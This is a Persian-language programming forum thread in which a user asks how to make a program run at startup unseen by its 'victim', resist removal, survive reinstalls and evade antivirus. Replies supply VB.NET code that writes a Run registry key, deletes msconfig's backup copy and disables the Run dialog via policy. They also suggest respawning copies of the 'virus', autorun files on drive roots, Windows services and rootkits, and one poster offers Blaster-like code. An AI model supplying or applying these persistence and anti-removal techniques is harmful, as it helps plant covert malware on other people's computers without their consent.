View Full Version : سوال: بهترین روش start up
hamidhws
چهارشنبه 27 آبان 1388, 20:50 عصر
با سلام
از مدیران خواهشمندم اگه جای تاپیک خوب نیست اونو منتقل کنند
میخواستم بدونم بهترین روش برای اجرای برنامه به صورت start up چیه؟ طوری که کاربر متوجه برنامه نشه و نتونه به سادگی اونو از start up برداره
آیا احتیاج به کد نویسیه خاصی داره ؟ یا باید فایلو تو مسیر خاصی کپی کرد؟ و اگه کد نویسی داره چه زبانی مناسبتره؟
و یه سوال دیگه داشتم آیا راهی هست که برنامه ما حتی در صورت عوض کردن ویندوز باز هم برنامه بتونه بصورت start up اجرا بشه؟
singel
چهارشنبه 27 آبان 1388, 22:14 عصر
به نظر من بهترينش ريجيستريه ، چون كاربري كه با ريجيستري اشنا نباشه نميتونه اونو حذف كنه
اما اگر روش ديگه اي هم هست دوست دارم دوستان بهمون معرفي كنن
Netsky
چهارشنبه 27 آبان 1388, 22:59 عصر
سلام .
بهترین روش همین ریجستری هست . ولی بازم میشه اونو از طریق msconfig هم حذف کرد .
اگه بخاید این کاربر نتونه کاری بکنه ، باید به طور مداوم مقدار خدوتون رو توی ریجستری وارد کنید که این کار هم با یک تایمر امکان پذیره .
hamidhws
پنج شنبه 28 آبان 1388, 02:29 صبح
با تشکر از باسخگویی دوستان عزیز
سلام .
بهترین روش همین ریجستری هست . ولی بازم میشه اونو از طریق msconfig هم حذف کرد .
اگه بخاید این کاربر نتونه کاری بکنه ، باید به طور مداوم مقدار خدوتون رو توی ریجستری وارد کنید که این کار هم با یک تایمر امکان پذیره .
میشه بیشتر توضیح بدید دوست عزیز؟مثلا همین روش رجیستری چطوریه و چه مقداری رو باید تغییر داد؟ اگه کامل توضیح بدید ممنون میشم دوست عزیز
hamidhws
پنج شنبه 28 آبان 1388, 03:11 صبح
و یه چیز دیگه اینکه در روش رجیستری فکرکنم با عوض کردن ویندوز برنامه از start up خارج میشه... برای این مشکل چیکار میشه کرد ؟
saeedr22
پنج شنبه 28 آبان 1388, 05:02 صبح
Imports Microsoft.Win32
Public Function RunInStartup()
regkey = Registry.LocalMachine.CreateSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
regkey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True)
regkey.SetValue("saeed", Application.StartupPath & "\client.exe")
regkey.Close()
End Function
با این دستور میتونی برنامه رو تو startup بزاری ...
می تونی دستور ریجستریی رو پیدا کنی که msconfig رو disable کنه.
Netsky
پنج شنبه 28 آبان 1388, 14:57 عصر
سلام .
دوست عزیزمون saeedr22 درست گفتن . برای حل مشکل msconfig از طریق ریجستری هرچی توی اینترنت گشتم نتونستم مسیرش رو پیدا کنم . توی هر سایت انگلیسی زبانی هم که رفتم ، راههایی مثل تغییر نام و یا نابود سازی فایل پیشنهاد شده بود ، که من راه دوم رو واسه شما کدش رو نوشتم :
Public Function Disable_Msconfig()
Dim Win_Drive As String
'------------------------
'in ghesmat baraye be dast avardane drive windows ast.
Win_Drive = My.Computer.Registry.GetValue("HKEY_CURRENT_USER\Volatile Environment", "HOMEDRIVE", 0)
'---------------
'in ghesmat baraye kharej khardane ((dllcache)) az halate super hidden mibashad.
SetAttr(Win_Drive & "\WINDOWS\system32\dllcache", FileAttribute.Hidden - FileAttribute.Hidden)
'---------------
'in ghesmat ham baraye nabood kardane file asli msconfig ast.
Kill(Win_Drive & "\WINDOWS\system32\dllcache\msconfig.exe")
End Function
البته مشکلاتی که این کد ممکنه درست کنه به من ربطی نداره و من به عنوان یه نکته برنامه نویسی بهش اشاره کردم . قبل از اجرای این کد هم پیشنهاد میکنم از فایل msconfig یه کپی تهیه کنید .
راستی شما قصد درست کردن یه بدافزار رو دارید . اگه اینطوره نباید در سایت برنامه نویس در مورد این چیزا بحث بشه .
بای .......................
hamidhws
پنج شنبه 28 آبان 1388, 17:10 عصر
با سلام و احترام خدمت تمامی دوستانی که نظرات پربارشون رو در اختیار بنده حقیر و بقیه دوستان گرام قرار میدهند.
دوست عزیزم من قصد تولید بد افزار ندارم و این مطلب فقط جنبه آموزشی داره
ممنون میشم این بنده حقیرو در این راه کمک کنید
دوست گلم از همه روش ها ممنون اما یه سوال داشتم اونم اینکه در روش های گفته شده سیستم قربانی مورد آسیب قرار میگیره هر چند ناچیز و در سطح پاک شدن msconfig اما اگه هدف بر این باشه که هم شخص متوجه برنامه نشه و هم سیستمش مورد آسیب قرار نگیره آیا راهی برای این کار هست؟
مثلا میشه کاری کرد که برنامه ما در msconfig نمایش داده نشه؟ یا راه هایی از این دست
پیشاپیش باز هم از دوستان عزیزم که نظراتشون رو میگن تشکر میکنم:قلب:
saeedr22
پنج شنبه 28 آبان 1388, 17:48 عصر
فعلاً با این کد میتونی run رو غیره فعال کنی.
Public Function DisableRun()
regkey = Registry.CurrentUser.CreateSubKey("Software\Microsoft\Windows\CurrentVersion\Policies \Explorer")
regkey = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Policies \Explorer", True)
regkey.SetValue("NoRun", 1)
regkey.Close()
End Function
softkadeh
پنج شنبه 28 آبان 1388, 19:19 عصر
سلام
اگه طرف حرفه ای نباشه مشکلی پیش نمیاد . هر دو روش خوبه ولی msconfig بهتره که rename بشه . البته disable کردن رجیستری هم راه خوبی هست .
کدهایی که دوستان نوشتند واقعأ کار راه اندازه و دیگه حرفی باقی نمیمونه .
نکته دیگه اینه که بهتره از روی فایل exe این ویروس به طور مداوم و در جاهای مختلف ساخته بشه که کاربر نتونه کاری انجام بده .
اگه میخوای یه چیز مثل بلاستر بنویسی بگو تا کدشو بذاریم ولی نمیدونم که ویروس نویسی با شرایط سایت مشکلی دارد یا نه .
در هر حال دوستان خیلی خوب و کامل راهنمایی کردند .
موفق باشید
hamidhws
جمعه 29 آبان 1388, 16:59 عصر
از دوستان عزیز singel (http://barnamenevis.org/forum/member.php?u=76721) Netsky (http://barnamenevis.org/forum/member.php?u=72605)softkadeh (http://barnamenevis.org/forum/member.php?u=117259)saeedr22 (http://barnamenevis.org/forum/member.php?u=79256) که با نظرات خوبشون بنده رو همراهی کردند سپاسگذارم
طبق گفته دوست عزیزم softkadeh همه مطالب گفته شده عالی و خوب بود و جا داره بازم تشکر کنم
فقط یه چیز کوچولو این وسط هست
اونم اینکه با توجه به اینکه این مسئله که من نمیخوام شخص متوجه برنامه من یا هر گونه اشکال در سیستمش بشه آیا با غیر فعال شدن run یا msconfig یا از این قبیل شخص شک نمیکنه؟ چون ممکنه ویندوز عوض کنه و برنامه ما هم همراش دود میشه
چون رجیستری هم همراه با عوض کردن ویندوز عوض میشه
اگه برای این مشکل هم راه حلی پیدا بشه خیلی خوب میشه
از دوستان عزیز طلب کمک دارم
قربون همگیتون بازم ممنون
Netsky
جمعه 29 آبان 1388, 18:31 عصر
سلام به همه دوستان عزیز .
با غیر فعال کردن run و msconfig اولین چیزی که به ذهن کاربر میرسه ( مخصوصا اگه حرفه ای نباشه ) وجود یک برنامه مخرب در سیستمش هست .
شما باید یک فایل از برنامتون به همراه یک فایل اتوران در ریشه درایو ها اجرا کنید تا اگه کاربر ویندوز رو عوض کرد با کلیک روی یکی از درایو هاش برنامه شما دوباره در سیستم راه اندازی بشه . البته این مورد در شرایطی کار میکنه که کاربر مورد نظر حرفه ای نباشه . ولی اگه حرفه ای باشه برای وارد شدن به درایوها از آدرس بار استفاده میکنه و بدون اینکه برنامه شما دوباره اجرا بشه ، عملیات پاکسازی رو انجام میده . ولی من تا اونجایی که میدونم فقط روت کیت ها قابلیت این رو دارند که بعد از تعویض ویندوز هم به کار خودشون ادامه میدن ، چون در سطح هسته ( کرنل ) فعالیت میکنند . البته نوشتن یه روت کیت توپ خیلی مشکله .
بای .............................
hamidhws
جمعه 29 آبان 1388, 23:32 عصر
سلام به همه دوستان عزیز .
با غیر فعال کردن run و msconfig اولین چیزی که به ذهن کاربر میرسه ( مخصوصا اگه حرفه ای نباشه ) وجود یک برنامه مخرب در سیستمش هست .
شما باید یک فایل از برنامتون به همراه یک فایل اتوران در ریشه درایو ها اجرا کنید تا اگه کاربر ویندوز رو عوض کرد با کلیک روی یکی از درایو هاش برنامه شما دوباره در سیستم راه اندازی بشه . البته این مورد در شرایطی کار میکنه که کاربر مورد نظر حرفه ای نباشه . ولی اگه حرفه ای باشه برای وارد شدن به درایوها از آدرس بار استفاده میکنه و بدون اینکه برنامه شما دوباره اجرا بشه ، عملیات پاکسازی رو انجام میده . ولی من تا اونجایی که میدونم فقط روت کیت ها قابلیت این رو دارند که بعد از تعویض ویندوز هم به کار خودشون ادامه میدن ، چون در سطح هسته ( کرنل ) فعالیت میکنند . البته نوشتن یه روت کیت توپ خیلی مشکله .
بای .............................
سلام دوست عزیز و ممنون از نظرات خوبتون
اگه ممکنه میشه بیشتر در مورد روت کیت توضیح بدید؟
قرمودید خیلی مشکله یعنی بیشتر از 1 ماه باید روش وقت بذارم؟
دوست عزیز این مساله برام خیلی مهمه و از همه مهمتر اینکه برنامه من به هیچ وجه لو نره
حاظرم چند ماه وقت بذارم روش اما در عوض بهترین روش ممکنو کار کنم
هدفم اینه:
1- برنامه به هیچ وجه از روی سیستم پاک نشه حتی با عوض کردن ویندوز
2-همیشه در حالت start up باشه
3-شخض و آنتی ویروس متوجه برنامه نشه و تا اونجا که ممکنه به سیستمش صدمه وارد نشه
"بازم تاکید میکنم این تاپیک فقط جنبه آموزشی داره "
مشتاقانه منتظر نظرات ارزشمند دوستان هستم
بازم ممنون :قلب:
MAHDIACTION
شنبه 30 آبان 1388, 11:45 صبح
من یه سورس به زبان c# دیده بودم که برنامه بدون اینکه تو startup قرار بگیره اجرا می شد . وقتی دنبال اینکه چطوری اجرا می شه رفتم اینو فهمیدم که برنامه oخودشو تو سرویس های ویندوز قرار می داد.
متاسفانه این کد مدت های زیادی هست که اونو پاک کردم ولی فکر کنم ازسایت
www.planet-source-code.com (http://www.planet-source-code.com) گرفته بودم
اگه اشتباهی در مطلب هست اونو اطلاع بدید .
hamidhws
شنبه 30 آبان 1388, 14:00 عصر
من یه سورس به زبان C# دیده بودم که برنامه بدون اینکه تو startup قرار بگیره اجرا می شد . وقتی دنبال اینکه چطوری اجرا می شه رفتم اینو فهمیدم که برنامه oخودشو تو سرویس های ویندوز قرار می داد.
متاسفانه این کد مدت های زیادی هست که اونو پاک کردم ولی فکر کنم ازسایت
www.planet-source-code.com (http://www.planet-source-code.com) گرفته بودم
اگه اشتباهی در مطلب هست اونو اطلاع بدید .
ممنون دوست عزیز
حدودای اسم سورس یادتون نمیاد که من تو اون سایت سرچ کنم؟
hamidhws
یک شنبه 01 آذر 1388, 02:39 صبح
دوستان کماکان منتظر نظرات خوبتون هستم
help me!
Netsky
دوشنبه 02 آذر 1388, 17:48 عصر
سلام .
دوست خوبم آقای hamidhws ، واسه اینکه یه مطلب جامع و کلی در مورد روتکیت ها گیر بیارین ، من توصیه میکنم هفته نامه بایت شماره 69 رو از اینترنت دانلود کنید و سپس صفحه 6 را مطالعه کنید .
بای .......................
hamidhws
یک شنبه 08 آذر 1388, 04:19 صبح
سلام .
دوست خوبم آقای hamidhws ، واسه اینکه یه مطلب جامع و کلی در مورد روتکیت ها گیر بیارین ، من توصیه میکنم هفته نامه بایت شماره 69 رو از اینترنت دانلود کنید و سپس صفحه 6 را مطالعه بخونید .
بای .......................
سلام از بندست عزیز
ممنون بابت راهنمایتون دوست عزیزم
چشم حتما به توصیتون عمل میکنم
باز هم ممنونم
vBulletin® v4.2.5, Copyright ©2000-1403, Jelsoft Enterprises Ltd.